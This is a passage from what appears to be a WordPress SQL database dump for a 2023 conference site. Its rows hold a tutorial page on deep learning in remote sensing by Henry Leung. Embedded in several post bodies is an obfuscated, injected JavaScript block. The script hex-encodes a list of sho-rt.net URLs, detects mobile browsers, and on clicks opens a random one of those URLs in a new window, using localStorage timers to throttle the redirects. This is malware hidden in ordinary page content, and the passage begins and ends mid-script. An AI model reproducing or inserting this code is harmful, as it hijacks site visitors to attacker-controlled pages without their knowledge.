function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Henry Leung','','publish','closed','closed','','henry-leung','','','2023-02-07 01:15:01','2023-02-07 01:15:01','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3715',0,'dt_team','',0),
(3716,1,'2023-02-02 10:01:52','2023-02-02 10:01:52','','in1','','inherit','open','closed','','in1','','','2023-02-02 10:01:52','2023-02-02 10:01:52','',3715,'https://gsw2023.com/wp-content/uploads/2023/02/in1.jpg',0,'attachment','image/jpeg',0),
(3717,1,'2023-02-02 10:05:23','2023-02-02 10:05:23','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3710\" img_size=\"1200x1000\"][vc_column_text]</p>\n<h5>Instructor</h5>\n<h6>Henry Leung</h6>\n<h6>Professor, Electrical and Software Engineering</h6>\n<h6>University of Calgary, Canada</h6>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"72\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5></h5>\n<h5 style=\"text-align: justify;\"><strong>Deep learning algorithms have been widely used in remote sensing because of their effectiveness in image processing and computer vision. In this tutorial, we will present a review of selected deep learning algorithms that are popular in the remote sensing community including convolutional neural networks (CNN), generative adversarial networks (GAN), transformers, transfer learning, and meta learning. In the second half of the tutorial, we will present our research works on these deep learning algorithms in different remote sensing applications: 1) Synthetic aperture radar (SAR) target recognition based on cross-domain and cross-task transfer learning, 2) image generation using GAN and its application to SAR targe recognition, 3) image fusion based on transformers and GAN, 4) satellite image segmentation for different types of satellite images using deep neural networks such as deeplabs and efficient nets, 5) target recognition using meta-learning with shared and specific structures for SAR, and 6) style transfer using GAN to transform remote sensing images among different domains such as SAR and optical images.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Deep Learning in Remote Sensing: Algorithms and Applications','','inherit','closed','closed','','3709-revision-v1','','','2023-02-02 10:05:23','2023-02-02 10:05:23','',3709,'https://gsw2023.com/?p=3717',0,'revision','',0),
(3718,1,'2023-02-02 10:12:00','2023-02-02 10:12:00','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3710\" img_size=\"1200x1000\"][vc_column_text]</p>\n<h5>Instructor</h5>\n<h6>Henry Leung</h6>\n<h6>Professor, Electrical and Software Engineering</h6>\n<h6>University of Calgary, Canada</h6>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"72\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5>Tutorial Topic</h5>\n<h5 style=\"text-align: justify;\"><strong>Deep learning algorithms have been widely used in remote sensing because of their effectiveness in image processing and computer vision. In this tutorial, we will present a review of selected deep learning algorithms that are popular in the remote sensing community including convolutional neural networks (CNN), generative adversarial networks (GAN), transformers, transfer learning, and meta learning. In the second half of the tutorial, we will present our research works on these deep learning algorithms in different remote sensing applications: 1) Synthetic aperture radar (SAR) target recognition based on cross-domain and cross-task transfer learning, 2) image generation using GAN and its application to SAR targe recognition, 3) image fusion based on transformers and GAN, 4) satellite image segmentation for different types of satellite images using deep neural networks such as deeplabs and efficient nets, 5) target recognition using meta-learning with shared and specific structures for SAR, and 6) style transfer using GAN to transform remote sensing images among different domains such as SAR and optical images.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 